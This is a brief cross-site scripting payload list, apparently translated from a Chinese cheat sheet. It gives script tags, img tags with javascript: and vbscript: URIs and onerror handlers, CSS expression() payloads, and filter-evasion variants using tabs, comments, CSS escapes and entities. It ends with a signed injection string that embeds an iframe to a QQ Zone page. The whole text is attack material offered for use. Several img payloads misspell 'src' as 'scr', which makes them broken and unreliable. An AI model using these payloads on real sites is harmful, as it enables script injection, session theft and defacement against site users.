<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the ???? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["